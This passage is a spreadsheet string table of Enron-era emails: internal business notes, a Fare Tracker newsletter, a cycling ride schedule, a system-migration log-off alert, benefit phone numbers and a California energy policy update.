    <t>frozenset({'josie.call@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'michel.nelson@enron.com', 'charlie.graham@enron.com', 'steve.gilbert@enron.com', 'mike.bonnstetter@enron.com', 'craig.buehler@enron.com', 'bob.stevens@enron.com', 'rr.mcgillivray@enron.com', 'mike.barry@enron.com', 'tom.gilbert@enron.com', 'ronald.matthews@enron.com', 'jim.talcott@enron.com', 'michele.winckowski@enron.com', 'rob.wilson@enron.com', 'lorraine.lindberg@enron.com', 'bill.mangels@enron.com', 'michael.norden@enron.com', 'chris.sebesta@enron.com', 'tim.kissner@enron.com', 'linda.trevino@enron.com', 'frank.oldenhuis@enron.com', 'loren.penkava@enron.com', 'mike.ullom@enron.com', 'david.kolarik@enron.com', 'phil.lowry@enron.com', 'kent.miller@enron.com', 'lorna.brennan@enron.com', 'mary.miller@enron.com', 'rich.jolly@enron.com', 'tim.johanson@enron.com', 'julia.white@enron.com', 'louis.soldano@enron.com', 'dave.waymire@enron.com', 'christine.stokes@enron.com', 'shelley.corman@enron.com', 'ted.ritchey@enron.com', 'bob.burleson@enron.com', 'kimberly.watson@enron.com', 'sue.neville@enron.com', 'morgan.gottsponer@enron.com', 'bill.fowler@enron.com', 'lindy.donoho@enron.com', 'donna.martens@enron.com', 'dave.neubauer@enron.com', 'vernon.mercaldo@enron.com', 'terry.galassini@enron.com', 'tony.perry@enron.com', 'ken.earl@enron.com', 'kim.wilkie@enron.com', 'lon.stanton@enron.com', 'jeff.nielsen@enron.com', 'kevin.hyatt@enron.com', 'frank.semin@enron.com', 'penny.mccarran@enron.com', 'gail.spevak@enron.com', 'nancy.bagot@enron.com', 'janet.bowers@enron.com', 'eileen.peebles@enron.com', 'joni.bollinger@enron.com', 'kip.baumert@enron.com', 'glen.hass@enron.com', 'steven.harris@enron.com', 'rod.hayslett@enron.com', 'steve.weller@enron.com', 'dave.odneal@enron.com', 'karen.brostad@enron.com', 'jeffery.fawcett@enron.com', 'david.sinclair@enron.com', 'janet.butler@enron.com', 'ken.powers@enron.com', 'deaun.trayer@enron.com', 'donald.vignaroli@enron.com', 'chuck.wilkinson@enron.com', 'john.dushinske@enron.com', 'steve.kirk@enron.com', 'tom.mertz@enron.com', 'patty.prigmore@enron.com', 'tom.halpin@enron.com', 'mike.mcgowan@enron.com', 'mark.adelmann@enron.com', 'keith.petersen@enron.com', 'drew.fossum@enron.com', 'ray.smith@enron.com', 'mike.underwood@enron.com', 'gary.zahn@enron.com', 'steve.thomas@enron.com', 'dana.jones@enron.com', 'david.badura@enron.com', 'maria.pavlou@enron.com', 'randy.rice@enron.com', 'bob.chandler@enron.com', 'steven.january@enron.com', 'dari.dornan@enron.com', 'michael.stage@enron.com', 'greg.cade@enron.com', 'michelle.lokay@enron.com', 'karen.lagerstrom@enron.com', 'danny.mccarty@enron.com'})</t>
  </si>
  <si>
    <t>Certificate Status Report</t>
  </si>
  <si>
    <t xml:space="preserve">Please see attached._x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Feb 2001 06:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: #523070</t>
  </si>
  <si>
    <t xml:space="preserve">this has been changed._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Sharen Cason                           02/14/2001 02:20 PM_x000D_
	_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc: Kimberly Hundl/Corp/Enron@Enron _x000D_
_x000D_
Subject: #523070_x000D_
_x000D_
This deal has an SP delivery point with firm energy._x000D_
_x000D_
Thanks!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 02:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'expedia.com_010891@expedia.customer-email.com'})</t>
  </si>
  <si>
    <t>Fare Tracker -- now better than ever!</t>
  </si>
  <si>
    <t>Dear peter,_x000D_
_x000D_
You told us you wanted more choices and more information in_x000D_
your Fare Tracker e-mails -- well, consider it done! Our_x000D_
improved Fare Tracker puts your ideas to work, making it_x000D_
easier than ever to find the fares you want._x000D_
_x000D_
More cities, more flexibility._x000D_
We can now track fares for almost every city -- including_x000D_
international cities -- to reflect the way you travel._x000D_
_x000D_
More information -- so you get the most for your money._x000D_
You=01,ll see the airlines=01, lowest published fares,* plus_x000D_
the range of fares found recently by Expedia.com travelers_x000D_
on your routes.**_x000D_
_x000D_
************************************************************_x000D_
TRAVEL NEWS_x000D_
************************************************************_x000D_
_x000D_
Every week, we bring you the latest fare sales and travel_x000D_
updates so you can make exactly the right travel choices._x000D_
_x000D_
Fly ATA and save 15%_x000D_
Now=01,s the time to book the perfect ski trip or bask in the_x000D_
Hawaiian sun -- and save 15%!  ATA flights throughout the_x000D_
U.S. are on sale through November 21. Travel by February 14._x000D_
http://redir.cq0.net/r/default.asp?R=3D000007454000ca68d_x000D_
_x000D_
Use your American Express card and save_x000D_
American Express and Expedia.com have teamed up to offer_x000D_
you some stellar savings. Book a Hyatt Hotel room and get_x000D_
$100 off a future stay. Or rent a compact car from Avis_x000D_
for just $27 a day._x000D_
http://redir.cq0.net/r/default.asp?R=3D000007458000ca68d_x000D_
_x000D_
Shop Expedia.com online, read Expedia Travels offline_x000D_
Expedia Travels, the brand-new magazine from Ziff Davis_x000D_
and Expedia.com, shows you how to use the Internet to_x000D_
travel better and smarter than ever. Get the premiere_x000D_
issue free, then subscribe for just $9.97 a year._x000D_
http://redir.cq0.net/r/default.asp?R=3D0000074a5000ca68d_x000D_
_x000D_
_x000D_
See what's new in other places:_x000D_
http://redir.cq0.net/r/default.asp?R=3D00000745c000ca68d_x000D_
_x000D_
************************************************************_x000D_
YOUR FARETRACKER LOW FARES_x000D_
************************************************************_x000D_
_x000D_
The airlines' lowest published fares, plus the range of_x000D_
fares found by Expedia.com travelers._x000D_
_x000D_
_x000D_
You can change your Fare Tracker routes at:_x000D_
http://redir.cq0.net/r/default.asp?R=3D0000074ae000ca68d&amp;qscr=3Dsubs_x000D_
_x000D_
Check out all your route and fare options with our Flight Wizard._x000D_
http://redir.cq0.net/r/default.asp?R=3D0000074ad000ca68d&amp;GOTO=3DFLIGHTWIZ&amp;r=_x000D_
frr=3D-70_x000D_
5&amp;EAPid=3D8510-1_x000D_
_x000D_
Visit Airline Fare List to check out published fares on any route._x000D_
http://redir.cq0.net/r/default.asp?R=3D000007451000ca68d&amp;qscr=3Dfpfl_x000D_
_x000D_
************************************************************_x000D_
SPECIAL DEALS_x000D_
************************************************************_x000D_
_x000D_
The best offers and promotions at Expedia.com, handpicked_x000D_
to bring you exciting opportunities and excellent value._x000D_
_x000D_
Expedia Special Rate: Radisson Resort Acapulco from $79_x000D_
Enjoy the luxurious warmth of old Mexico from your own_x000D_
private beach._x000D_
http://redir.cq0.net/r/default.asp?R=3D00000745d000ca68d_x000D_
_x000D_
Away.com: Ski, Dog Sled, and Snowshoe in Ontario from $355_x000D_
A truly unique adventure -- perfect for outdoor_x000D_
enthusiasts._x000D_
http://redir.cq0.net/r/default.asp?R=3D00000745d000ca68d_x000D_
_x000D_
Cruise Outlet: Australia to New Zealand from $999_x000D_
Fourteen days of incredible sights, including Tasmania and_x000D_
Sydney._x000D_
http://redir.cq0.net/r/default.asp?R=3D00000745d000ca68d_x000D_
_x000D_
_x000D_
Looking for more great deals on Expedia.com? See our_x000D_
Special Deals at:_x000D_
http://redir.cq0.net/r/default.asp?R=3D0000078c0000ca68d&amp;qscr=3Dspdl_x000D_
_x000D_
_x000D_
Thank you for traveling with Expedia.com._x000D_
_x000D_
Expedia.com Travel Team_x000D_
Don't just travel. Travel Right.(TM)_x000D_
http://redir.cq0.net/r/default.asp?R=3D000007834000ca68d_x000D_
_x000D_
************************************************************_x000D_
FROM OUR SPONSORS_x000D_
************************************************************_x000D_
Winter Specials from Wyndham Resorts._x000D_
_x000D_
Introducing "Memories On Us Spending Spree" from Wyndham_x000D_
Resorts. Stay five nights or more from January 1 through_x000D_
April 7, 2001 at participating resorts, get a $250 credit_x000D_
on your choice of services. Call 800-WYNDHAM for_x000D_
information. Book by December 1, 2000._x000D_
Restrictions apply. Visit Wyndham.com._x000D_
_x000D_
http://redir.cq0.net/r/default.asp?R=3D0000078c1000ca68d_x000D_
_x000D_
_x000D_
************************************************************_x000D_
************************************************************_x000D_
_x000D_
*The airlines' lowest published fares are the lowest_x000D_
roundtrip fares published by the airlines for your routes._x000D_
These fares may not be available on the days you wish to_x000D_
travel. Our Fare Calendar shows you when these fares are_x000D_
available. To use Fare Calendar, click the link below:_x000D_
http://redir.cq0.net/r/default.asp?R=3D000007895000ca68d&amp;qscr=3Dftap_x000D_
_x000D_
**The range of recent fare prices found by Expedia.com_x000D_
customers -- the lowest and highest fares found for your_x000D_
routes -- can help determine the ideal price for your route._x000D_
_x000D_
************************************************************_x000D_
************************************************************_x000D_
_x000D_
All Prices are quoted in U.S. Dollars._x000D_
_x000D_
You are receiving this e-mail because you are a registered_x000D_
member of Expedia.com._x000D_
_x000D_
Questions?_x000D_
Visit the Expedia.com Customer Support Center at:_x000D_
http://redir.cq0.net/r/default.asp?R=3D00000786b000ca68d_x000D_
_x000D_
If you do not wish to receive any further e-mails from us,_x000D_
please reply to this mail with "unsubscribe" in the subject_x000D_
line._x000D_
_x000D_
Sorry, but we can't reply to responses to Fare Tracker._x000D_
If you have questions or want to give feedback, please_x000D_
go to:_x000D_
http://redir.cq0.net/r/default.asp?R=3D000007899000ca68d&amp;qscr=3Dcomt&amp;Calr=_x000D_
=3D_x000D_
_x000D_
(c) 1998, 1999, 2000 Expedia, Inc. All rights reserved_x000D_
_x000D_
_x000D_
 This email was sent to:  pkeavey@ect.enron.com</t>
  </si>
  <si>
    <t>Mon, 18 Dec 2000 03:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Sheila,_x000D_
_x000D_
Gran't number:  (281) 381 9987._x000D_
_x000D_
_x000D_
This is his cell phone number._x000D_
_x000D_
_x000D_
Vince</t>
  </si>
  <si>
    <t>Sun, 1 Oct 2000 10:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rmgarth@mediaone.net'})</t>
  </si>
  <si>
    <t xml:space="preserve">Hey Ben!? I just saw your message from 9/26. I  guess I'm one of those who is _x000D_
lazy about checking e-mails {or just not used to  it.}? It has been busy _x000D_
around here. The SNCARC dinner was a success, but  I'm glad it is over now.? _x000D_
Kara seems to be doing a bit better. I was there  today and we went out for a _x000D_
walk. It was good.? I think she has a ways to  go though.? I'm glad to hear _x000D_
that you are going to be staying in  Houston.? I'd like to hear more about _x000D_
how that all went. Well, I'd better  get dinner started.? Hope you had a good _x000D_
weekend.? Love ya!  </t>
  </si>
  <si>
    <t>Wed, 1 Mar 2000 07:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>MS Distance &amp; Hills Training Series</t>
  </si>
  <si>
    <t>Dan Lyons will conduct a four-ride training series leading up to the MS150 =_x000D_
on=20_x000D_
the dates and at the places described below.  The rides will consist of two=_x000D_
=20_x000D_
rides in the low 50=01,s, a metric century (low 60=01,s) and a century.  Th=_x000D_
e=20_x000D_
terrain will range from what Dan considers to be light hills, through=20_x000D_
moderately hilly to hilly, and the traffic on each ride will be light to=20_x000D_
moderate.  The rides will not be sagged (although each of the rides will ha=_x000D_
ve=20_x000D_
stores at various distances) and riders should come prepared with water, fo=_x000D_
od=20_x000D_
and the equipment necessary to repair flat tires.  The goal will be to ride=_x000D_
=20_x000D_
these rides at a pace between 14-16MPH and to get in a little hill work=20_x000D_
before the MS150.  Although prior commitment is not a requirement, Dan woul=_x000D_
d=20_x000D_
appreciate some kind of a head count, so if you plan on doing one or more o=_x000D_
f=20_x000D_
these rides, please email him at dan.lyons@enron.com or leave him a voice=_x000D_
=20_x000D_
mail at (713) 853-1648.  All rides will leave promptly at 8:00 a.m. so be=_x000D_
=20_x000D_
sure to arrive in time to be ready for a wheels up departure at 8:00 a.m.. =_x000D_
=20_x000D_
Look for Dan in his electric blue Explorer of ancient vintage._x000D_
_x000D_
March 4.  The ride will leave from the Kleb Nature Reserve on FM 2920,=20_x000D_
located approximately two miles west of the intersection of FM 2920 and=20_x000D_
Cypress Rosehill Road.  This is a lightly hilled ride and will swing north=_x000D_
=20_x000D_
and west up through Fields Store and back via Magnolia and Stagecoach. =20_x000D_
Mileage; low 50=01,s._x000D_
_x000D_
March 11 (Open Date)_x000D_
_x000D_
March 18.  This ride will start from Magnolia Jr. High School in Magnolia o=_x000D_
n=20_x000D_
FM 1774 just south of FM 1488.  This ride will go north to Plantersville, d=_x000D_
o=20_x000D_
a loop to the west and then come back via Dobbin.  This is a moderately hil=_x000D_
ly=20_x000D_
ride.  Mileage; low 50=01,s._x000D_
_x000D_
March 25.  This ride will start from Royal Jr. High School in Pattison abou=_x000D_
t=20_x000D_
three miles north of Brookshire off of either FM 359 or FM 362.  This is a=_x000D_
=20_x000D_
moderately hilly ride that goes up through Burleigh and Racoon Bend to=20_x000D_
Belville and back by way of FM 529 and FM 359.  Mileage; low 60=01,s._x000D_
_x000D_
April 1 (Open Date)_x000D_
_x000D_
April 8.  This ride will leave from the Tomball middle school on FM 2920 in=_x000D_
=20_x000D_
downtown Tomball about a mile east of the intersection of FM 249 and FM=20_x000D_
2920.  This is a hilly ride.  It will go north through Egypt and Honea up t=_x000D_
o=20_x000D_
Montgomery and then north and west to Richards in Grimes County via the Sam=_x000D_
=20_x000D_
Houston National Forest.  It will then loop west and south coming back via=_x000D_
=20_x000D_
Dacus and Dobbin.  This century will get you ready for the big ride._x000D_
_x000D_
Hope to see you.</t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 07:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.schroeder@enron.com', 'peter.styles@enron.com', 'karen.denne@enron.com', "nicholas.o'day@enron.com", 'rob.bradley@enron.com', 'mary.hain@enron.com', 'jeannie.mandelker@enron.com', 'mona.petrochko@enron.com', 'mike.dahlke@enron.com', 'paul.kaufman@enron.com', 'richard.shapiro@enron.com', 'susan.mara@enron.com', 'pvandore@cato.org', 'peggy.mahoney@enron.com', 'steven.kean@enron.com', 'shelley.corman@enron.com', 'gia.maisashvili@enron.com', 'filuntz@aol.com', 'elizabeth.linnell@enron.com', 'margaret.carson@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'sandra.mccubbin@enron.com', 'mark.palmer@enron.com', 'john.neslage@enron.com', 'ann.schmidt@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Please see the attached articles:_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 Jan 2002 12:27:31 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michael.mier@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Villeggiante, Theresa  _x000D_
Sent:	Thursday, January 31, 2002 7:44 AM_x000D_
To:	Badeer, Robert; Buerkle, Jim; Calger, Christopher F.; Clark, Ed; Donovan, Terry W.; Driscoll, Michael M.; Eriksson, Fredrik; Etringer, Michael; Gilbert, Jim; Hall, Steve C. (Legal); Lackey, Chris; Motley, Matt; Nelson, Kourtney; Page, Jonalan; Perry, Todd; Rosman, Stewart; Sarnowski, Julie; Shields, Jeff; Slaughter, Jeff G.; Swerzbin, Mike; Thomas, Jake; Thome, Stephen; Van houten, Maria; Wente, Laura; Williams III, Bill_x000D_
Subject:	_x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Thu, 28 Oct 1999 01:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Sara Shackleton/HOU/ECT on 10/28/99 08:55 _x000D_
AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Stewart Rosman                           10/27/99 07:02 PM_x000D_
	_x000D_
_x000D_
To: Sara Shackleton/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: SMUD_x000D_
_x000D_
Sara -_x000D_
SMUD gave us their version of the ISDA agreement about 6 weeks ago and I am _x000D_
still waiting for comments.  I believe Susan Flynn is working on it and I _x000D_
thought we would get comments by this past Monday.  They want to start doing _x000D_
financial gas and power swaps and I would really like to wrap up the legal _x000D_
contract side of things.  Can someone please call or email me and tell me the _x000D_
status._x000D_
_x000D_
Thank you (503-464-3810)_x000D_
_x000D_
Stewart_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 01:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Redoing of the TRA/ TCBA accounts</t>
  </si>
  <si>
    <t xml:space="preserve">We'll have an internal call to discuss this prior to launching any missiles.  _x000D_
Jeanne, please have Mike give me a call to discuss.  Thanks._x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	JMB &lt;JBennett@GMSSR.com&gt;_x000D_
	01/25/2001 05:34 PM_x000D_
		 _x000D_
		 To: "Gordon Savage (E-mail)" &lt;gsavage@enron.com&gt;, "Harry Kingerski (E-mail)" _x000D_
&lt;Harry.Kingerski@enron.com&gt;, Jeff.Dasovich@enron.com, mulrich@enron.com, _x000D_
sstoness@enron.com, "'tjohnso8@enron.com'" &lt;tjohnso8@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Redoing of the TRA/ TCBA accounts_x000D_
_x000D_
I just got a call from Mike Day who is up in Sacramento where they are_x000D_
considering legislation which would muck around with the TRA and TCBA_x000D_
accounts.  The legislation, as currently drafted, would not undertake a_x000D_
wholesale adoption of the TURN proposal to transfer all undercollections_x000D_
from the TRA to the TCBA. _x000D_
_x000D_
Mike is trying to get hold of any analysis which was done which shows what_x000D_
the current balances in the TCBA and TRA would have been if TURN's proposal_x000D_
had been in place from day one. I know we put a halt on undertaking that_x000D_
analysis when we learned that TURN was doing it for their testimony._x000D_
However, Mike seems to think getting something like that before the_x000D_
legislature in the next few days may be critical.  If we had to undertake_x000D_
it, how long would it take to get a product?_x000D_
_x000D_
I have a call into Bob Finkelstein to see if they have already done the_x000D_
analysis, but have not heard back._x000D_
_x000D_
Jeanne    _x000D_
        _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Sep 2000 09:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'william.kelly@enron.com'})</t>
  </si>
  <si>
    <t>Re: Transport Issues</t>
  </si>
  <si>
    <t xml:space="preserve">I'm here.  Judy and Scott Goodell are out._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  William Kelly                           09/12/2000 08:33 AM_x000D_
	_x000D_
_x000D_
To: Dan Junek/HOU/ECT@ECT, Judy Townsend/HOU/ECT@ECT, Chris _x000D_
Germany/HOU/ECT@ECT, Kyle Etter/HOU/ECT_x000D_
cc:  _x000D_
Subject: Transport Issues_x000D_
_x000D_
Would you be available to meet on Thursday @ 3:00?_x000D_
_x000D_
EB32C2_x000D_
_x000D_
I'll order cookies......_x000D_
_x000D_
WK_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'jennifer.nguyen@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'vladimir.gorny@enron.com', 'john.lavorato@enron.com', 'leslie.reeves@enron.com', 'stacey.white@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>Power Curve Validation January 2001</t>
  </si>
  <si>
    <t>Please do not hesitate to contact me with any questions.  _x000D_
_x000D_
Thanks,_x000D_
Jennifer</t>
  </si>
  <si>
    <t>Thu, 1 Jun 2000 02:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>legal/credit meeting</t>
  </si>
  <si>
    <t>Taffy:  Did you ever deliver a recap of our Tuesday meeting to legal and _x000D_
credit?  Sara</t>
  </si>
  <si>
    <t>Wed, 13 Sep 2000 02:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'iaia14@hotmail.com'})</t>
  </si>
  <si>
    <t>Iaia:_x000D_
How the hell are ya?  Wanted to drop you a line and see how you were doing _x000D_
and let you know that Brandon and I continued the tradition and went to the _x000D_
DMB concert last night.  Must say that it wasn't the same as being with you _x000D_
in a limo, but we still had fun.  Wanted to get your number up there, b/c I _x000D_
will be up in Chicago for Thanksgiving and was hoping to meet you in Chicago _x000D_
then.  Gotta run, but I hope all is going well and I'll talk to you soon._x000D_
Ben</t>
  </si>
  <si>
    <t>Thu, 11 Jan 2001 08:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chris.hilgert@enron.com', 'gerald.nemec@enron.com', 'mark.knippa@enron.com'})</t>
  </si>
  <si>
    <t>Meeting 1/12/00</t>
  </si>
  <si>
    <t>A meeting has been scheduled for tomorrow, 1/12, for Chris Hilgert, Mark _x000D_
Knippa,  and Gerald Nemec to discuss the Gulf Power Agreement in EB 3583 from _x000D_
3:30 to 4:30.  If you have any questions or conflicts, please contact Lacye _x000D_
Trevino @ X 34887._x000D_
_x000D_
Thank you,_x000D_
Lacye</t>
  </si>
  <si>
    <t>Wed, 12 Dec 2001 09:08:09 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Enron Benefit Phone Numbers</t>
  </si>
  <si>
    <t>_x000D_
1-800-332-7979 Benefit Service Center _x000D_
Health and Group Plans, Option 1 _x000D_
Cash Balance Plan, Option 2 _x000D_
Saving and Employee Stock Ownership Plan, Option 3 _x000D_
Employee Stock Options, Option 4 _x000D_
1-800-251-0669 Cigna Healthcare (Group #0024647)_x000D_
1-800-433-0153 United Healthcare (Group #175910)_x000D_
1-800-457-1020 MerckMedco RX (Group #EnronRx)_x000D_
1-800-492-8588 MetLife Dental (Group #39742 or 38866)_x000D_
1-800-345-1391 Innovative Resource Group (Enron EAP and Mental Health Claims)_x000D_
1-800-877-7195 Vision Service (Group 46303)_x000D_
_x000D_
_x000D_
Michelle Lokay_x000D_
Account Director_x000D_
Transwestern Commercial Group_x000D_
713-345-7932</t>
  </si>
  <si>
    <t>Sun, 3 Sep 2000 04:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>I have called you several times this morning but your phone rolls over to a _x000D_
messaging system that won't let me leave a message. That's ok today because I _x000D_
need to talk to you live, but it is good to know that I can't get ahold of _x000D_
you when I need to. I wonder if Bracewell's Wash. office has the same _x000D_
problem?</t>
  </si>
  <si>
    <t>Wed, 10 Oct 2001 17:54:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kecook@earthlink.net'})</t>
  </si>
  <si>
    <t>Hello again</t>
  </si>
  <si>
    <t>_x000D_
Hi Liz,_x000D_
 _x000D_
It was fun catching up with you at  Dr.Injak's.  Like you, I married a geologist (my dad and brother-in-law are  also geologists).  It's a nice change from lawyers.  _x000D_
I hope Sam is doing OK.  What did the doctor  say to do for him?_x000D_
Let me know what your schedule is like and we can  meet some time.  I'm fairly flexible, but have a nanny only 2 days per  week, so the rest of the time Connor is with me.  My little  shadow._x000D_
 _x000D_
Ciao,_x000D_
Kathy Ellis Cook</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 10:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: More reasons we need to revise the ENA authorized traders list_x000D_
 generally and right away</t>
  </si>
  <si>
    <t xml:space="preserve">Cheryl:_x000D_
_x000D_
Just a bit of history:  I think that the partial listing of officers on the _x000D_
(authorized traders) list is only meant to be illustrative of corporate _x000D_
officers and directors.  The ENA unanimous consent for the relevant company _x000D_
is the authority for document execution.  If, for example, a VP is authorized _x000D_
to execute for a particular company (by virtue of a corporate resolution or _x000D_
unanimous consent) and that particular VP's name does not appear in the _x000D_
partial listing, exection is not invalidated.  The execution is valid._x000D_
_x000D_
Have you had a broker question ENA's authority?_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
_x000D_
_x000D_
	Cheryl Nelson@ENRON_x000D_
	Sent by: Cheryl Nelson@ENRON_x000D_
	04/05/2001 03:57 PM_x000D_
		 _x000D_
		 To: Stephanie Panus/NA/Enron@Enron_x000D_
		 cc: Sara Shackleton/HOU/ECT@ECT, Keegan Farrell/NA/Enron@Enron_x000D_
		 Subject: More reasons we need to revise the ENA authorized traders list _x000D_
generally and right away_x000D_
_x000D_
Hey Stephanie, we need to revise this list because it does not make sense at _x000D_
least with respect to ENA.  It does not list key people (e.g. Gary) and it is _x000D_
inconsistent with the resolutions.  For example, the resolutions say that a _x000D_
managing director and treasurer can be a designated person to open an account _x000D_
but ENA does not have such an officer.  There are MD's and then there is a VP _x000D_
and Treasurer.  There are I think other inconsistencies we need to clear up _x000D_
to avoid having the accounts invalidated.  Having these points clear is _x000D_
especially important where, like now, we won't have Gary or Mark Frevert sign _x000D_
because they are out of town and we need to open the account right away.  _x000D_
_x000D_
I know you are swamped so I will work tonight on revising the List for ENA _x000D_
tonight and give the revisions to do first thing in the morning._x000D_
_x000D_
Can you revise the List for ECT today (or just doublecheck it) so that we do _x000D_
not have a hold up in executing the Goldman International account for ECT _x000D_
first thing in the morning.  I promised Sheila Glover we would execute it _x000D_
right away._x000D_
_x000D_
Did we open any ENA accounts in the past two weeks and if so, just to be _x000D_
clear, can we send them a list that includes Gary's name and title if he _x000D_
signed._x000D_
_x000D_
Cheryl Nelson_x000D_
Senior Counsel_x000D_
EB3816_x000D_
(713) 345-4693_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Feb 2002 09:38:05 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'jae.black@enron.com', 'jeff.king@enron.com', 'patrick.hanse@enron.com', 'dana.davis@enron.com', 'diana.allen@enron.com', '/o=enron/ou=na/cn=recipients/cn=notesaddr/cn=a478079f-55e1f3b0-862566fa-612229@enron.com', 'corry.bentley@enron.com', 'mauricio.marquez@enron.com', 'jeffrey.miller@enron.com', 'l..day@enron.com', 'eric.saibi@enron.com', 'rika.imai@enron.com', 'doug.gilbert-smith@enron.com', 'jason.kaniss@enron.com', 'lloyd.will@enron.com', 'kevin.cline@enron.com', 'paul.schiavone@enron.com', 'larry.valderrama@enron.com', 'ted.ballinger@enron.com', 'jason.choate@enron.com', 'russell.ballato@enron.com', 'seung-taek.oh@enron.com', 'd..thomas@enron.com', 'ryan.williams@enron.com', 'peter.makkai@enron.com', 'carrie.larkworthy@enron.com', 'm..presto@enron.com', 'alan.chen@enron.com', 'michael.seely@enron.com', 'j..sturm@enron.com', 'claudia.guerra@enron.com', 'gustavo.giron@enron.com', 'debra.bailey@enron.com', 'mike.carson@enron.com', 'l..garcia@enron.com', 'steve.wang@enron.com', 'david.ryan@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'maria.valdes@enron.com', 'joe.errigo@enron.com', 'mark.symms@enron.com', 'robert.stalford@enron.com', 'robert.benson@enron.com', 'bryce.schneider@enron.com', 'willis.philip@enron.com'})</t>
  </si>
  <si>
    <t>ALERT!!</t>
  </si>
  <si>
    <t>_x000D_
There will be a UBSWE Migration TONIGHT....please make sure that you LOG OFF before you leave today.  _x000D_
_x000D_
Monday morning, (2/4/02), you will logon with your Enron NT Account and Password.  You will immediately be forced to change your password (following Enron rules) and your NT ID will stay the same.  Once you've changed your password, and logged off AGAIN, you will see the UBS Warburg Energy Screen....email will not be affected until day one._x000D_
_x000D_
Starting Monday, you will receive emails from IT support to explain the HOW TO's for your data that YOU  will need to begin transferring over to UBS.  All material will need to be in compliance with UBS standards and NO documents or emails are to be deleted.  In Outlook the following information will be transferred over by IT: Calendar, Contacts, Tasks, and Notes.  Emails (Inbox, Sent Items and Deleted Items) and folder structure will NOT be migrated._x000D_
_x000D_
ALL data MUST be migrated PRIOR to day one (estimated to be 02/08/02 ), as access to Enron data will be disabled Day 1._x000D_
_x000D_
Thanks for your immediate help in this matter._x000D_
_x000D_
_x000D_
T.Jae Black_x000D_
East Power Trading_x000D_
Assistant to Kevin Presto_x000D_
off. 713-853-5800_x000D_
fax 713-646-8272_x000D_
cell 713-539-4760</t>
  </si>
  <si>
    <t>Fri, 7 Sep 2001 12:09:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>California Update 9-07-2001</t>
  </si>
  <si>
    <t xml:space="preserve">For questions or comments regarding this report please contact G. Britt Whitman at ex:5-4014 or Kristin Walsh at ex:3-9510._x000D_
_x000D_
EXECUTIVE SUMMARY_x000D_
?	MOU Passes Assembly, Faces Fight in Senate_x000D_
? CPUC Direct Access Delayed by Senator_x000D_
_x000D_
SoCal Developments_x000D_
As reported in the press this morning, the bailout passed the Assembly late last night by a 41-32 vote.  It will now head to the Senate, where very significant opposition is expected.  Along with his opposition to the changes made in the Assembly regarding the size of businesses that pay the dedicated rate component for the bailout, Senator Burton also has expressed privately that he is against paying twice book value for SoCal's transmission assets._x000D_
 _x000D_
Senator Places Hold on CPUC Direct Access Vote_x000D_
Regarding the CPUC's decision to delay its hearings on the rate order and various other bond implementation measures (which led Treasurer Angelides to announce that the bond issue will have to be re-timed), this delay is due to a bill by Senator Burton that passed the Assembly Appropriations Committee yesterday.  Burton's bill would take the place of the current proposed rate agreement (from Governor Davis) and would require greater disclosure and transparency in DWR ratemaking, as well as separate the payment streams for the bonds from payment streams for power.  In doing so, Burton's bill preserves more PUC authority than would be preserved under the rate order currently before the PUC - thus the delay in action._x000D_
 _x000D_
